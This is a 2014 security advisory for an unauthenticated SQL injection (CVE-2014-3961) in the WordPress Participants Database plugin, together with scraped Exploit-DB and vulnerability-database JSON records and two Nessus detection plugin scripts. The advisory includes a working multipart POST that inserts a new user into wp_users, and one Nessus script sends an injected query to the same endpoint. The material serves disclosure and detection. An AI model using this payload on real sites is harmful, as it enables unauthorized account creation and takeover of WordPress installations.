Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress
=========================================================================
Program: Participants Database <= 1.5.4.8
Severity: Unauthenticated attacker can fully compromise the Wordpress
installation
Permalink: http://www.yarubo.com/advisories/1
— Info —
Participants Database is a popular Wordpress plugin that offers the
functionality needed to build and maintain a database of people. As of
today the plugin has been downloaded 92,089 times.
— Vulnerability details —
1. Due to insufficient privilege checks it is possible for anonymous
(unauthenticated) users to trigger some administrative actions If any of
the shortcodes is used (e.g. signup page).
2. The action "export CSV" takes a parameter called "query" that can
contain an arbitrary SQL query. This means that an unauthenticated user can
execute arbitrary SQL statements (e.g. create an admin user, read or write
files, or execute code depending on the MySQL user privileges).
— Exploit —
Add a user to wordpress as follows (if you want an admin user, also add
admin privileges to wp_usermeta):
POST /wordpress/pdb-signup/ HTTP/1.1
Host: www.example.com
Content-Length: 789
(…)
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryuoACADe1C2IFWMxN
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="action"
output CSV
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="CSV_type"
participant list
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="subsource"
participants-database
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="query"
INSERT INTO wp_users
(ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)
VALUES
(31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);
------WebKitFormBoundaryuoACADe1C2IFWMxN
— Solution —
This issue has been fixed in version 1.5.4.9. Download the newest version
from:
https://wordpress.org/plugins/participants-database/
— Credit —
Yarubo Research Team
research [at] yarubo.com
Network Security Scan:
http://www.yarubo.com/
Free Heartbleed Scan:
http://www.yarubo.com/heartbleed
{"id": "EDB-ID:33613", "hash": "2716e81c64a7d68def9bd4f0ddd82e52", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress Participants Database 1.5.4.8 - SQL Injection", "description": "Wordpress Participants Database 1.5.4.8 - SQL Injection. CVE-2014-3961. Webapps exploit for php platform", "published": "2014-06-02T00:00:00", "modified": "2014-06-02T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "href": "https://www.exploit-db.com/exploits/33613/", "reporter": "Yarubo Research Team", "references": [], "cvelist": ["CVE-2014-3961"], "lastseen": "2016-02-03T19:32:54", "history": [], "viewCount": 11, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2016-02-03T19:32:54"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-3961"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:7247"]}, {"type": "nessus", "idList": ["WORDPRESS_PARTICIPANTS_DATABASE_SQL_INJECTION.NASL", "WORDPRESS_PARTICIPANTS_DATABASE_1_5_4_9_SQLI.NASL"]}], "modified": "2016-02-03T19:32:54"}, "vulnersScore": 6.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/33613/", "sourceData": "Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress\r\n=========================================================================\r\n\r\nProgram: Participants Database <= 1.5.4.8\r\nSeverity: Unauthenticated attacker can fully compromise the Wordpress\r\ninstallation\r\nPermalink: http://www.yarubo.com/advisories/1\r\n\r\n\u2014 Info \u2014\r\n\r\nParticipants Database is a popular Wordpress plugin that offers the\r\nfunctionality needed to build and maintain a database of people. As of\r\ntoday the plugin has been downloaded 92,089 times.\r\n\r\n\u2014 Vulnerability details \u2014\r\n\r\n1. Due to insufficient privilege checks it is possible for anonymous\r\n(unauthenticated) users to trigger some administrative actions If any of\r\nthe shortcodes is used (e.g. signup page).\r\n\r\n2. The action \"export CSV\" takes a parameter called \"query\" that can\r\ncontain an arbitrary SQL query. This means that an unauthenticated user can\r\nexecute arbitrary SQL statements (e.g. create an admin user, read or write\r\nfiles, or execute code depending on the MySQL user privileges).\r\n\r\n\r\n\u2014 Exploit \u2014\r\n\r\nAdd a user to wordpress as follows (if you want an admin user, also add\r\nadmin privileges to wp_usermeta):\r\n\r\n\r\nPOST /wordpress/pdb-signup/ HTTP/1.1\r\nHost: www.example.com\r\nContent-Length: 789\r\n(\u2026)\r\nContent-Type: multipart/form-data;\r\nboundary=----WebKitFormBoundaryuoACADe1C2IFWMxN\r\n\r\n------WebKitFormBoundaryuoACADe1C2IFWMxN\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\noutput CSV\r\n------WebKitFormBoundaryuoACADe1C2IFWMxN\r\nContent-Disposition: form-data; name=\"CSV_type\"\r\n\r\nparticipant list\r\n------WebKitFormBoundaryuoACADe1C2IFWMxN\r\nContent-Disposition: form-data; name=\"subsource\"\r\n\r\nparticipants-database\r\n------WebKitFormBoundaryuoACADe1C2IFWMxN\r\nContent-Disposition: form-data; name=\"query\"\r\n\r\nINSERT INTO wp_users\r\n(ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)\r\nVALUES\r\n(31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);\r\n\r\n------WebKitFormBoundaryuoACADe1C2IFWMxN\r\n\r\n\r\n\r\n\u2014 Solution \u2014\r\n\r\nThis issue has been fixed in version 1.5.4.9. Download the newest version\r\nfrom:\r\n\r\nhttps://wordpress.org/plugins/participants-database/\r\n\r\n\r\n\u2014 Credit \u2014\r\n\r\n\r\nYarubo Research Team\r\nresearch [at] yarubo.com\r\n\r\nNetwork Security Scan:\r\nhttp://www.yarubo.com/\r\n\r\nFree Heartbleed Scan:\r\nhttp://www.yarubo.com/heartbleed", "osvdbidlist": ["107626"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:13:46", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in the Export CSV page in the Participants Database plugin before 1.5.4.9 for WordPress allows remote attackers to execute arbitrary SQL commands via the query parameter in an \"output CSV\" action to pdb-signup/.", "modified": "2014-06-05T14:48:00", "id": "CVE-2014-3961", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3961", "published": "2014-06-04T14:55:00", "title": "CVE-2014-3961", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2019-12-11T13:39:33", "bulletinFamily": "software", "description": "WordPress Vulnerability - Participants Database 1.5.4.8 - pdb-signup CSV_type Action query Parameter SQL Injection\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:7247", "href": "https://wpvulndb.com/vulnerabilities/7247", "type": "wpvulndb", "title": "Participants Database 1.5.4.8 - pdb-signup CSV_type Action query Parameter SQL Injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-12-13T09:58:10", "bulletinFamily": "scanner", "description": "The Participants Database Plugin for WordPress installed on the remote\nhost is affected by a SQL injection vulnerability due to a failure to\nproperly sanitize user-supplied input to the ", "modified": "2019-12-02T00:00:00", "id": "WORDPRESS_PARTICIPANTS_DATABASE_SQL_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/76072", "published": "2014-06-16T00:00:00", "title": "Participants Database Plugin for WordPress 'query' Parameter SQL Injection", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76072);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-3961\");\n script_bugtraq_id(67769);\n script_xref(name:\"EDB-ID\", value:\"33613\");\n\n script_name(english:\"Participants Database Plugin for WordPress 'query' Parameter SQL Injection\");\n script_summary(english:\"Attempts to execute a SQL query.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is affected by a SQL\ninjection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Participants Database Plugin for WordPress installed on the remote\nhost is affected by a SQL injection vulnerability due to a failure to\nproperly sanitize user-supplied input to the 'query' parameter in the\npdb-signup script. An unauthenticated, remote attacker can exploit\nthis issue to inject or manipulate SQL queries in the back-end\ndatabase, resulting in the manipulation or disclosure of arbitrary\ndata.\n\nNote that the application is also reportedly affected by an\nunspecified flaw in which insufficient privilege checks allow an\nunauthenticated user to execute actions reserved for administrative\nusers when shortcodes are used; however, Nessus has not tested this\nissue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Jun/0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/plugins/participants-database/#changelog\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Participants Database Plugin version 1.5.4.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:xnau:participants_databas3\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\", \"wordpress_participants_database_1_5_4_9_sqli.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\ninclude(\"data_protection.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"Participants Database\";\n\n# Check KB first\nget_kb_item_or_exit(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nurl_path = install['Redirect'];\nif (!isnull(url_path)) url = url_path;\nelse url = dir + \"/\";\n\ntoken = SCRIPT_NAME - \".nasl\" + \"-\" + unixtime();\nid = rand() % 10000 + rand();\n\nquery = \"INSERT INTO wp_posts (ID, post_title, post_content) SELECT '\" +\n id + \"', '\" + token + \"', CONCAT('MySQL Version : ', @@version, '\" +\n \"\\nWordPress User : ', user_login, '\\nCurrent Database : ', database())\" +\n \"from wp_users LIMIT 1;\";\n\nquery = urlencode(\n str : query,\n unreserved : \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234\" +\n \"56789=()_-;@:,\"\n);\n\nboundary1 = '---------------------------XXXXXXXXXXXXX';\nboundary = '-----------------------------XXXXXXXXXXXXX';\n\npostdata =\n boundary + '\\n' +\n 'Content-Disposition: form-data; name=\"action\"\\n\\n' +\n 'output CSV\\n' +\n boundary + '\\n' +\n 'Content-Disposition: form-data; name=\"CSV_type\"\\n\\n' +\n 'participant list\\n' +\n boundary + '\\n' +\n 'Content-Disposition: form-data; name=\"subsource\"\\n\\n' +\n 'participants-database\\n' +\n boundary + '\\n' +\n 'Content-Disposition: form-data; name=\"query\"\\n\\n' +\n query + '\\n' +\n boundary + '--\\n';\n\n# Attempt exploit\nres = http_send_recv3(\n method : \"POST\",\n item : url,\n data : postdata,\n add_headers : make_array(\"Content-Type\", \"multipart/form-data; boundary=\" +\n boundary1),\n port : port,\n exit_on_fail : TRUE\n);\n\nattack_req = http_last_sent_request();\n\n# Verify our attack worked\nurl2 = \"?page_id=\" + id;\nres2 = http_send_recv3(\n method : \"GET\",\n item : url + url2,\n port : port,\n follow_redirect : TRUE, # In case permalinks are used\n exit_on_fail : TRUE\n);\n\nif (\n \"MySQL Version\" >< res2[2] &&\n \"WordPress User : \" >< res2[2] &&\n token >< res2[2]\n)\n{\n output = strstr(res2[2], \"MySQL Version\");\n if (empty_or_null(output)) output = res[2];\n\n extra = 'Note that Nessus has not removed the blog post created by the POST'+\n '\\n' + 'request above; it will need to be manually removed.\\n';\n\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n sqli : TRUE, # Sets SQLInjection KB key,\n line_limit : 5,\n request : make_list(attack_req, build_url(qs:url+url2, port:port)),\n output : data_protection::sanitize_user_full_redaction(output:output)\n );\n exit(0);\n}\nelse\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T09:58:10", "bulletinFamily": "scanner", "description": "The Participants Database Plugin for WordPress installed on the remote\nhost is prior to version 1.5.4.9. It is, therefore, affected by a SQL\ninjection vulnerability due to failure to properly sanitize\nuser-supplied input to the ", "modified": "2019-12-02T00:00:00", "id": "WORDPRESS_PARTICIPANTS_DATABASE_1_5_4_9_SQLI.NASL", "href": "https://www.tenable.com/plugins/nessus/76071", "published": "2014-06-16T00:00:00", "title": "Participants Database Plugin for WordPress < 1.5.4.9 'query' Parameter SQL Injection", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76071);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-3961\");\n script_bugtraq_id(67769);\n script_xref(name:\"EDB-ID\", value:\"33613\");\n\n script_name(english:\"Participants Database Plugin for WordPress < 1.5.4.9 'query' Parameter SQL Injection\");\n script_summary(english:\"Checks the plugin version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is affected by a SQL\ninjection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Participants Database Plugin for WordPress installed on the remote\nhost is prior to version 1.5.4.9. It is, therefore, affected by a SQL\ninjection vulnerability due to failure to properly sanitize\nuser-supplied input to the 'query' parameter in the 'pdb-signup'\nscript. A remote, unauthenticated attacker could leverage this issue\nto execute arbitrary SQL statements against the backend database,\nleading to manipulation of data or the disclosure of arbitrary data.\n\nThe application is reportedly also affected by an unspecified flaw in\nwhich insufficient privilege checks allows an unauthenticated user to\nexecute actions reserved for administrative users when shortcodes are\nused.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Jun/0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/plugins/participants-database/#changelog\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.5.4.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:xnau:participants_databas3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"Participants Database\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n regexes = make_list();\n regexes[0] = make_list(\"function serializeList\", \"#confirmation-dialog'\");\n checks[\"/wp-content/plugins/participants-database/js/manage_fields.js\"] = regexes;\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\nversion = UNKNOWN_VER;\n\n# Get version from readme.txt\nres = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + \"/wp-content/plugins/participants-database/readme.txt\",\n exit_on_fail : TRUE\n);\n\nif (\"=== Participants Database ===\" >< res[2] && \"Stable tag:\" >< res[2])\n{\n match = NULL;\n # Check Changelog section as Stable tag does not appear to be updated often\n output = strstr(res[2], \"== Changelog ==\");\n if (!isnull(output))\n {\n match = eregmatch(pattern:\"= ([0-9\\.]+) =\", string:output);\n if (!isnull(match)) version = match[1];\n }\n # Fall back to Stable Tag as a backup\n else\n {\n pattern = \"Stable tag: ([0-9\\.]+)\";\n match = eregmatch(pattern:pattern, string:res[2]);\n }\n if (isnull(match)) exit(1, \"Failed to read the 'readme.txt' file for the WordPress \" + plugin + \" located at \" + install_url + \".\");\n version = match[1];\n\n\n fix = \"1.5.4.9\";\n if (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n {\n set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' +install_url+\n '\\n Installed version : ' +version+\n '\\n Fixed version : ' +fix + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n}\naudit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\", version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}